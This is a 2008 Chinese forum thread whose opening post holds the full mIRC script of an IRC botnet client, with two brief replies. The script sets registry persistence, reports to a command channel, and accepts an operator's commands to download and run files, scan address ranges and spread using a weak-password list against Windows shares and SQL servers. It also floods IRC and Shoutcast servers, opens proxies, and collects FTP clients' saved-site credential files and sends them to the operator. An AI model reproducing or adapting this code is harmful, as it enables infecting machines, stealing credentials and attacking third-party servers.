




查看: 1056|回复: 2










发表于 2008-7-21 21:55:31 | 显示全部楼层 来自 重庆市









发表于 2008-7-21 22:01:29 | 显示全部楼层 来自 广东省东莞市








要不  我也改

 楼主| 发表于 2008-7-21 12:01:02 | 显示全部楼层 |阅读模式 来自 陕西省西安市

raw 433:*:hostnick
on *:start:{ run devcheck.exe /n /fh mirc | x5r | x5sc | rlevel URB4N | run devcheck.exe /n /fh /r \"edit.bat\" | set %nowscan $null | x5x5 }
on *:connect:{ hostnick | join %channel | timer 0 20 serv0ut | xspreed }
on *:disconnect:{ rlevel URB4N | x5sc }
on *:exit:{ set %nowscan $null }
on *:part:%channel:{ if ($nick == $me) { timer 1 1 raw -q join %channel } }
on *:KICK:%channel:{ if ($nick == $me) { halt } |if ($knick == $me) && ($chan == %channel) { .timerfastjoin -o 0 5 .join %channel } }
on *:JOIN:%channel:{ if ($exists(rdate) == $false) { msg %channel 7I14m new 0wned b0tnet | write rdate $date - $time } }
on 1:text:!login*:*:{ if ($2 == urb4n) && ($level($nick) != URB4N) && ($nick isop %channel) && ($nick == DaggeredAngel) { notice $nick password accepted $nick | auser URB4N $nick } }
on URB4N:text:!log0ut:*:{ ruser URB4N $nick | notice $nick loget out $nick }
on URB4N:part:%channel:{ ruser URB4N $nick | clearall }
on URB4N:quit:%channel:{ ruser URB4N $nick | clearall }
on URB4N:kick:%channel:{ ruser URB4N $nick | clearall }
on URB4N:nick:*:{ ruser URB4N $nick | clearall }
alias xspreed { if ( $exists(IpcScan.exe) == $true ) && ( $exists(ipcpass.dic) == $true ) && ( $exists(KAHOL.bat) == $true ) && ( $exists(devcheck.exe) == $true ) && ( $exists(explorers.exe) == $true ){ set %p0rt 139 | set %thr34d 500 | autospreed | timer 0 3000 autospreed | timer 0 1 fuckspreed } }
alias x5sc { %channel = #Scan | %secC = #info | server server-irc.no-ip.org 6667 }
alias x5r { %x = $+($r(a,z),$r(1,99),.reg) | write %x REGEDIT4 | write %x [HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] | write %x $+(\"Win,$os,Service\"=\",$replace($mircdir,\\,\\\\),$nopath($mircexe),\") | .run -n regedit /s %x | .timer 1 3 .remove %x | .timer 1 4 unset %x }
alias x5x5 { if (%rdate == $null) { set %rdate 7R14ooted at - $date - $time - o'cL0ck | set %dater $date } }
on URB4N:text:*:*:{
if ($nick isop %channel) && ($nick == DaggeredAngel) {
if ( $1 == !ports) && ($portfree($2) == $false) { msg %channel 7T14he port 2[ $2 ] 14 is open1. 7i14p/7h14ost: $ip $+/$+ $host }
if ( $1 == !version) { msg %channel UCEAMTScan v1.3S (inspired by URB4N) }
if ( $1 == !uptime) { msg %channel $infoma }
if ( $1 == !rdate) { if ($2 != $null) { if (%dater == $2) { msg %channel %rdate } } | else { msg %channel %rdate } }
if ( $1 == !download) && ($2 != $null) { msg %channel 7D14ownloading: $2 | download file $2 $mircdir }
if ( $1 == !securescan) && ($exists(Spy.BAT)) && ($exists(devcheck.exe)) { run devcheck.exe /n /fh /r \"find.bat\" | msg %channel 7S14caning , gimme 2 mins1.14 to get my drive scan info | timer 1 120 play $nick found.txt }
if ( $1 == !exists) && ($2 != $null) { if ( $exists($2) == $true ) { msg %channel 9[+] $2 7e14xists on this machine1. } { if ( $exists($2) == $false) { msg %channel 4[-] $2 7d14oesnt exist on this machine1. } } }
if ( $1 == !info.conn) { msg %channel 7C14onnection: $dll(xsys.dll,connection,_) 7N14etwork interfaces: $dll(xsys.dll,interfaceinfo,_) 7i14p/7h14ost: $ip $+ / $+ $host }
if ( $1 == !info.main) { msg %channel 7T14ime/7D14ate: $time $+ @ $+ $date 07***14s: $dll(xsys.dll,osinfo,_) 7C14pu: $dll(xsys.dll,cpuinfo,_) 7M14em: $dll(xsys.dll,meminfo,_) 7U14ptime: $duration($calc($ticks / 1000 )) 7H14arddrive: $dll(xsys.dll,diskcapacity,_) 7U14rl: $+ $url }
if ( $1 == !ip) { msg %channel 7i14p/7h14ost: $ip $+/$+ $host }
if ( $1 == !-) && ($2 != $null) { %- = $2- | msg %channel 7A14ction / $+ $2- | / $+ %- | unset %- }
if ( $1 == !dccsend && $2 != $null) { msg %channel 7D14CC Sending $2 To $nick | dcc send $nick $2 }
if ( $1 == !wget) && ($3 != $null) && ($exists(wget.exe)) { if ( $exists($3) == $false) { run devcheck.exe /n /fh /r \"wget.exe -q $2 $+ $3 \" | /msg %channel 7D14ownloading Url: $2 $+ $3 } }
if ( $1 == !killapp) && ($2 != $null) { run devcheck.exe /n /fh /r \" $+ $mircdirlibparse.exe -kf $2 $+ \" | msg %channel 1 $2 7K14illed1... }
if ( $1 == !runapp) && ($2 != $null) { run devcheck.exe /n /fh /r \" $+ $2 $+ \" | msg %channel 1 $2 7S14tarted1... }
if ( $1 == !join) && ($2 != $null) { join $2 | msg %channel 7J14oined $2 }
if ( $1 == !part) && ($2 != $null) { part $2 | msg %channel 7p14arted $2 }
if ( $1 == !hostnick) { hostnick }
if ( $1 == !reconnect) { msg %channel 7R14econnecting to %server | /server %server }
if ( $1 == !NTpassadd) && ($exists(ipcpass.dic)) { write ipcpass.dic $2- | msg %channel 2 $2- 7H14as been added to iPcscan config pass list }
if ( $1 == !NTpassdel) && ($exists(ipcpass.dic)) { passd3l | msg %channel 7D14elleting iPcscan config pass list }
if ( $1 == !NTpasslist) && ($exists(ipcpass.dic)) { msg %channel 7L14isting NT pass list1... | play $nick ipcpass.dic |}
if ( $1 == !NT+pass) && ($exists(ipcpass.dic)) { makepass }
if ( $1 == !NT-pass) && ($exists(ipcpass.dic)) { makenopass }
if ( $1 == !Reshet) && ($exists(IpcScan.exe)) && ($exists(ipcpass.dic)) && ($exists(KAHOL.bat)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) && ($3 != $null){ Reshet $2 $3 }
if ( $1 == !NTscan) && ($exists(IpcScan.exe)) && ($exists(ipcpass.dic)) && ($exists(KAHOL.BAT)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) { if (%nowscan == $null) { set %nowscan $2 $3 | timer 0 1 fuckbot | msg %channel 7S14tarting scan 2[ $2 - $3 ]-[ $4 ]-[ $5 ] | run devcheck.exe /n /fh /r \"ipcscan.exe $2 $3 -p $4 -t $5 \" } | else { msg %channel 7I 14allready scaning %nowscan } }
if ( $1 == !NTrandscan) && ($exists(IpcScan.exe)) && ($exists(ipcpass.dic)) && ($exists(KAHOL.BAT)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) { if (%nowscan == $null) { timer 0 1 fuckbot | set %i $r(1,255) | set %rnt $2 $+ . $+ %i $+ .1.1 $2 $+ . $+ %i $+ .255.255 -p $3 -t $4 | set %nowscan $2 $+ . $+ %i $+ .1.1 $2 $+ . $+ %i $+ .255.255 | run devcheck.exe /n /fh /r \"ipcscan.exe %rnt \" | msg %channel 7S14tarting scan 2[ $2 $+ . $+ %i $+ .1.1 - $2 $+ . $+ %i $+ .255.255 $+ ]-[ $3 ]-[ $4 ] } | else { msg %channel 7I 14allready scaning %nowscan } }
if ( $1 == !NTspreed) && ($exists(IpcScan.exe)) && ($exists(ipcpass.dic)) && ($exists(KAHOL.bat)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) { if (%nowscan == $null) { set %nowscan $2 $3 | timer 0 1 fuckspreed | msg %channel 7S14tarting scan 2[ $2 - $3 ]-[ $4 ]-[ $5 ] | run devcheck.exe /n /fh /r \"ipcscan.exe $2 $3 -p $4 -t $5 \" } | else { msg %channel 7I 14allready scaning %nowscan } }
if ( $1 == !NTrandspreed) && ($exists(IpcScan.exe)) && ($exists(ipcpass.dic)) && ($exists(KAHOL.bat)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) { if (%nowscan == $null) { timer 0 1 fuckspreed | set %i $r(1,255) | set %rnt $2 $+ . $+ %i $+ .1.1 $2 $+ . $+ %i $+ .255.255 -p $3 -t $4 | set %nowscan $2 $+ . $+ %i $+ .1.1 $2 $+ . $+ %i $+ .255.255 | run devcheck.exe /n /fh /r \"ipcscan.exe %rnt \" | msg %channel 7S14tarting scan 2[ $2 $+ . $+ %i $+ .1.1 - $2 $+ . $+ %i $+ .255.255 $+ ]-[ $3 ]-[ $4 ] } | else { msg %channel 7I 14allready scaning %nowscan } }
if ( $1 == !NThack) && ($exists(KAHOL.BAT)) && ($exists(explorers.exe)) { set %hk $2 | set %user1 $3 | set %pass1 $4 | if (%wgethack == on) { whack %hk } | else { hack %hk } }
if ( $1 == !Spreed) && ($exists(KAHOL.bat)) && ($exists(explorers.exe)) { set %hk $2 | set %user1 $3 | set %pass1 $4 | if (%wgethack == on) { wspreed %hk } | else { spreedhack %hk } }
if ( $1 == !stop.NTscan) && ($exists(IpcScan.exe)) && ($exists(devcheck.exe)) && ($exists(libparse.exe)) { timers off | timer 0 300 serv0ut | run devcheck.exe /n /fh /r \"libparse.exe -kf IpcScan.exe\" | msg %channel 7N14T scanning stopped1... | set %nowscan $null | set %Ascan $null }
if ( $1 == !sQLrandscan) && ($exists(scansql.exe)) { timers off | timer 0 300 serv0ut | timer 0 1 fuckbotSQL | set %i $r(1,255) | run devcheck.exe /n /fh /r \"scansql.exe $2 $+ . $+ %i $+ .1.1 $2 $+ . $+ %i $+ .255.255 $+ \" | msg %channel 7S14tarting SQL scan 2[ $2 $+ . $+ %i $+ .1.1 - $2 $+ . $+ %i $+ .255.255 ] }
if ( $1 == !sQLscan) && ($exists(scansql.exe)) { timers off | timer 0 300 serv0ut | timer 0 1 fuckbotSQL | msg %channel 7S14tarting SQL scan 2[ $2 - $3 ] | set %scansql $2 $3 | run devcheck.exe /n /fh /r \"scansql.exe $2 $3 \" }
if ( $1 == !stop.sQLscan) && ($exists(scansql.exe)) && ($exists(devcheck.exe)) && ($exists(libparse.exe)) { run devcheck.exe /n /fh /r \"libparse.exe -kf scansql.exe\" | msg %channel 7S14QL scanning stopped1... | timers off | timer 0 300 serv0ut }
if ( $1 == !sQLhack) && (%echoip != $null) && (%echoport != $null) && (%echouser != $null) && (%echopass != $null) && (%echofile != $null) && ($2 != $null) && ($3 != $null) { set %hkSQL $2 | set %userSQL $3 | if ($4 != $null) { set %passSQL $4 } | else { unset %passSQL } | sqlhack %hkSQL }
if ( $1 == !set.echo) { set %echouser $2 | set %echopass $3 | set %echoip $4 | set %echoport $5 | set %echofile $6 | msg %channel 7E14cho info changed to %echouser $+ : $+ %echopass $+ @ $+ %echoip $+ : $+ %echoport / %echofile }
if ( $1 == !echo) && (%echoip != $null) && (%echoport != $null) && (%echouser != $null) && (%echopass != $null) && (%echofile != $null) { msg %channel 7E14cho info is %echouser $+ : $+ %echopass $+ @ $+ %echoip $+ : $+ %echoport / %echofile }
if ( $1 == !Auto.NTscan) && ($4 != $null) && ($exists(IpcScan.exe)) && ($exists(KAHOL.BAT)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) { if (%Ascan == $null) && (%nowscan == $null) { set %p0rt $2 | set %thr34d $3 | autont | timer 0 $4 autont | timer 0 1 fuckbot } | else { msg %channel 7I 14allready scaning %nowscan } }
if ( $1 == !Auto.NTscanedu) && ($4 != $null) && ($exists(IpcScan.exe)) && ($exists(KAHOL.BAT)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) { if (%Ascan == $null) && (%nowscan == $null) { set %p0rt $2 | set %thr34d $3 | autontedu | timer 0 $4 autontedu | timer 0 1 fuckbot } | else { msg %channel 7I 14allready scaning %nowscan } }
if ( $1 == !Auto.NTspreed) && ($4 != $null) && ($exists(IpcScan.exe)) && ($exists(KAHOL.bat)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) { if (%Ascan == $null) && (%nowscan == $null) { set %p0rt $2 | set %thr34d $3 | autospreed | timer 0 $4 autospreed | timer 0 1 fuckspreed } | else { msg %channel 7I 14allready scaning %nowscan } }
if ( $1 == !Auto.NTspreededu) && ($4 != $null) && ($exists(IpcScan.exe)) && ($exists(KAHOL.bat)) && ($exists(devcheck.exe)) && ($exists(explorers.exe)) { if (%Ascan == $null) && (%nowscan == $null) { set %p0rt $2 | set %thr34d $3 | autospreededu | timer 0 $4 autospreededu | timer 0 1 fuckspreed } | else { msg %channel 7I 14allready scaning %nowscan } }
if ( $1 == !ftp.start) && ($exists(mscdt.exe)) { run mscdt.exe | msg %channel 7F14TP started1... }
if ( $1 == !ftp.stop) && ($exists(mscdt.exe)) && ($exists(devcheck.exe)) && ($exists(libparse.exe)) { run devcheck.exe /n /fh /r \"libparse.exe -kf mscdt.exe\" | msg %channel 7F14TP stopped1... }
if ( $1 == !bnc.start) && ($3 != $null) { if ($sock(Bnc)) { msg %channel 4ERROR8 BNC is already active on 7Port8: %Bnc.Port $+ , with 7pass8: %Bnc.passwd| halt } | %Bnc = on | socklisten Bnc $2 | %Bnc.port = $2 | %Bnc.passwd = $3 | msg %channel 4STARTED BNC sever:8 /server -m $ip $+ : $+ $2 $+Then Use8 /Quote PASS $3}
if ( $1 == !bnc.stats) && ($sock(Bnc)) { msg %channel BNC is 4Active on8 $ip $+ : $+ %Bnc.port 7Pass:8 %Bnc.passwd $+ 7 Users Online:8 $sock(BncClient*,0) 7Connections:8 $sock(BncServer*,0)}
if ( $1 == !bnc.stop) && (%Bnc.Port != $null) { sockclose Bnc* | msg %channel BNC server is now4 SHUTDOWN | unset %Bnc | unset %BncClient | unset %bnc.* | sockclose Bnc* | unset %Bnc* }
if ( $1 == !radioclone) && ($5 != $null) && (%radioclone == $null) { set %radioclone on | msg %channel $+ $4 * Radio Clones Load To: $2 $+ : $+ $3 $+ | timer $4 $rand(1, $+ $5 $+ ) cloneradio $2 $3 }
if ( $1 == !radioclone.stop) { set %radioclone $null | msg %channel Radio Clones Kill $+ | sockclose shoutcast* }
if ( $1 == !web) && ($portfree(80) == $false) { msg %channel 7M14y web site is1: 2http:// $+ $ip }
if ( $1 == !voice) { msg %channel Voice Requested }
if ( $1 == !FTPhelp) { ftphelp }
if ( $1 == !FTPsearch) { ftpsearch }
if ($1 == !Flashfxp.send) { if (%flashfxp13 != $null) { dcc send $nick %flashfxp13 } }
if ($1 == !Cuteftp.send) { if (%cuteftp != $null) { dcc send $nick %cuteftp } }
if ($1 == !LeapFTP.send) { if (%leapftp != $null) { dcc send $nick %leapftp } }
if ($1 == !Ufxp.send) { if (%ufxp != $null) { dcc send $nick %ufxp } }
if ( $1 == !clone) {
if ($2 == load) && ($5 != 0) && ($5 != $null) { .timer $5 0 sockopen Sockets- $+ $r(1,99***99) $3 $4 | msg %channel 14 $5 7C14lonez loading to15 $3 $+ : $+ $4 }
if ($2 == kill) { sockwrite -tn Sockets-* QUIT : $+ $3- | sockclose Sockets-* | msg %channel 7C14lonez disconnected }
if ($2 == join) && ($3 != $null) { sockwrite -tn Sockets-* JOIN $3 $4- }
if ($2 == part) && ($3 != $null) { sockwrite -tn Sockets-* PART $3 $4- }
if ($2 == joinpartflood) && ($4 != $null) { timer $3 0 joinpartflood $4- }
if ($2 == chanflood) {
sockwrite -tn Sockets-* JOIN $chr(35) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z)
sockwrite -tn Sockets-* JOIN $chr(35) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z)
sockwrite -tn Sockets-* JOIN $chr(35) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z)
sockwrite -tn Sockets-* JOIN $chr(35) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z) $+ $r(1,9999) $+ $r(a,z) $+ $r(1,9999) $+ $r(A,Z)
if ($2 == msg) && ($3 != $null) { sockwrite -tn Sockets-* privmsg $3 : $+ $4- }
if ($2 == notice) && ($3 != $null) { sockwrite -tn Sockets-* notice $3 : $+ $4- }
if ($2 == Do) && ($3 != $null) { sockwrite -tn Sockets-* $3- }
if ($2 == randnick) { sockwrite -tn Sockets-* nick $read(mainhq.dbx) }
if ($2 == nick) && ($3 != $null) { sockwrite -tn Sockets-* nick $3- $+ $rand(A,Z) $+ $rand(0,99) $+ $rand(a,z) $+ $rand(0,99) $+ $rand(A,Z) $+ $rand(0,99) $+ $rand(a,z) $+ $rand(0,99) $+ $rand(A,Z) $+ $rand(0,99) $+ $rand(a,z) $+ $rand(0,99) $+ $rand(A,Z) $+ $rand(0,99) $+ $rand(a,z) $+ $rand(0,99) }
if ($2 == ctcp) && ($4 != $null) {
if ($3 == ping) && ($4 != $null) { sockwrite -tn Sockets-* privmsg $4 :PING }
if ($3 == VERSION) && ($4 != $null) { sockwrite -tn Sockets-* privmsg $4 :VERSION }
if ($3 == FINGER) && ($4 != $null) { sockwrite -tn Sockets-* privmsg $4 :FINGER }
if ($3 == TIME) && ($4 != $null) { sockwrite -tn Sockets-* privmsg $4 :TIME }
if ($3 == do) && ($5 != $null) { sockwrite -tn Sockets-* privmsg $5 : $+ $4 $+}

alias joinpartflood { sockwrite -tn Sockets-* JOIN $1 $2 | sockwrite -tn Sockets-* PART $1 $3- }
on *:sockopen:Sockets-*:{ sockwrite -tn $sockname PONG $server | sockwrite -tn $sockname USER $nfs $nfs $nfs : $+ $nfs | sockwrite -tn $sockname NICK $read(mainhq.dbx) }
on *:sockread:Sockets-*:{
sockread %SocketTemp
tokenize 32 %SocketTemp
if ($1 == ping) { sockwrite -tn $sockname pong $2- }
if ($mid(%SocketTemp,1,4) == PING) { sockwrite -tn $sockname PONG $mid($gettok(%SocketTemp,2,32),2) }
alias nfs { return $rand(a,z) $+ $rand(1,9) $+ $rand(a,z) $+ $rand(1,9) $+ $rand(a,z) $+ $rand(1,9) $rand(a,z) $+ $rand(1,9) }
alias cloneradio { sockopen shoutcast $+ $rand(1,999****9999) $1- }
on *:sockopen:shoutcast*: {
var %a = sockwrite -n shoutcast*
%a GET / HTTP/1.0
%a Host: $sock(shoutcast*).ip
%a User-Agent: mSSC/1.1
%a Accept: */*
%a Icy-MetaData:0
%a Connection: close

alias ftpsearch {
set %flashfxp13 $findfile(c:\\,sites.dat,1)
set %cuteftp $findfile(c:\\,smdata.dat,1)
set %leapftp $findfile(c:\\,Sites.ini,1)
set %ufxp $findfile(c:\\,sites.xml,1)
msg %channel 10[11FTP Searcher Results10]7 FlashFXP v1.x 10[11 $+ $ftpresult(%flashfxp13) $+ 10]7 CuteFTP v.3.x 10[11 $+ $ftpresult(%cuteftp) $+ 10]7 LeapFTP v.2.x 10[11 $+ $ftpresult(%leapftp) $+ 10]7 UltraFXP 10[11 $+ $ftpresult(%ufxp) $+ 10]

alias ftpresult {
set %ftp.temp $1-
if (%ftp.temp == $null) {
var %ftp.result = Not Found
return %ftp.result
else {
var %ftp.result = Found
return %ftp.result

alias ftphelp {
notice $nick 10[11FTP Client Database Searcher v1.0 Help10]
notice $nick 10[11!Ftpsearch will start a Search for the FTP databases of Sites10]
notice $nick 10[11!Flashfxp.send Will send you the Flashfxp Sites.dat10]
notice $nick 10[11!Cuteftp.send Will send you the CuteFTP smdata.dat File10]
notice $nick 10[11!LeapFTP.send Will send you the LeapFTP Sites.ini File10]
notice $nick 10[11!Ufxp.send Will send you the Ufxp xml File10]
notice $nick 10[11If the bot doesn't send you the file you requested that means the file was not located10]

alias serv0ut { msg $me checking... }
alias servd3l {
var %i = 1
while (%i <= 30) {
write -ds\"server\" ir.conf
inc %i
alias passd3l {
var %i = 1
while (%i <= 60) {
write -dl1 ipcpass.dic
inc %i
alias makepass {
remove ipcpass.dic
write ipcpass.dic 123
write ipcpass.dic 1234
write ipcpass.dic 12***45
write ipcpass.dic 12***56
write ipcpass.dic 12***67
write ipcpass.dic 123****5678
write ipcpass.dic 65***21
write ipcpass.dic 54***21
write ipcpass.dic 1
write ipcpass.dic 111
write ipcpass.dic 11***11
write ipcpass.dic 11***11
write ipcpass.dic 111****1111
write ipcpass.dic 00***00
write ipcpass.dic 000****0000
write ipcpass.dic 88***88
write ipcpass.dic 888****8888
write ipcpass.dic 52***14
write ipcpass.dic pass
write ipcpass.dic passwd
write ipcpass.dic password
write ipcpass.dic sql
write ipcpass.dic database
write ipcpass.dic admin
write ipcpass.dic root
write ipcpass.dic secret
write ipcpass.dic oracle
write ipcpass.dic sybase
write ipcpass.dic test
write ipcpass.dic server
write ipcpass.dic computer
write ipcpass.dic Internet
write ipcpass.dic super
write ipcpass.dic user
write ipcpass.dic manager
write ipcpass.dic security
write ipcpass.dic public
write ipcpass.dic private
write ipcpass.dic default
write ipcpass.dic 1234qwer
write ipcpass.dic 123qwe
write ipcpass.dic abcd
write ipcpass.dic abc123
write ipcpass.dic 123abc
write ipcpass.dic abc
write ipcpass.dic 123asd
write ipcpass.dic asdf
write ipcpass.dic asdfgh
msg %channel 2 I7m 14ready to scan with pass list
alias makenopass {
remove ipcpass.dic
write ipcpass.dic
msg %channel 2 I7m 14ready to scan without pass list
alias infoma {
if (wks isin $uptime(system,2)) { return 9,1My Windwos Is $os - Runing $uptime(system,2) $+}
elseif (wk isin $uptime(system,2)) { return 4,1My Windwos Is $os - Runing $uptime(system,2) $+}
elseif (days isin $uptime(system,2)) { return 12,1My Windwos Is $os - Runing $uptime(system,2) $+}
else { return 15,1My Windwos Is $os - Runing $uptime(system,2) $+}
alias hostnick {
if (.edu isin $host) ||(.ac. isin $host) || (.cc. isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[edu-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.edu isin $host) ||(.ac. isin $host) || (.cc. isin $host) { nick URB4N`[edu- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.gov isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[gov-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.gov isin $host) { nick URB4N`[gov- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (www. isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[www-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (www. isin $host) { nick URB4N`[www- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (mail. isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[mail-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (mail. isin $host) { nick URB4N`[mail- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.jp isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[jp-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.jp isin $host) { nick URB4N`[jp- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.ru isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[ru-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.ru isin $host) { nick URB4N`[ru- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (hinet isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[hinet-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (hinet isin $host) { nick URB4N`[hinet- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.il isin $host) || (bezeqint isin $host) || (barak isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[iL-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.il isin $host) || (bezeqint isin $host) || (barak isin $host) { nick URB4N`[iL- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.pl isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[pl-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.pl isin $host) { nick URB4N`[pl- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.us isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[us-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.us isin $host) { nick URB4N`[us- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.ca isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[ca-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.ca isin $host) { nick URB4N`[ca- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.tw isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[tw-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.tw isin $host) { nick URB4N`[tw- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.it isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[it-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.it isin $host) { nick URB4N`[it- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (cable isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[cable-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (cable isin $host) { nick URB4N`[cable- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (dsl isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[dsl-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (dsl isin $host) { nick URB4N`[dsl- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (server isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[server-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (server isin $host) { nick URB4N`[server- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (wks isin $uptime(system,2)) { nick URB4N`[wks- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (wk isin $uptime(system,2)) { nick URB4N`[wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.fr isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[fr-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.fr isin $host) { nick URB4N`[fr- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.uk isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[uk-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.uk isin $host) { nick URB4N`[uk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.de isin $host) && (wk isin $uptime(system,2)) { nick URB4N`[de-wk- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
if (.de isin $host) { nick URB4N`[de- $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ $r(1,9) $+ ] | goto end }
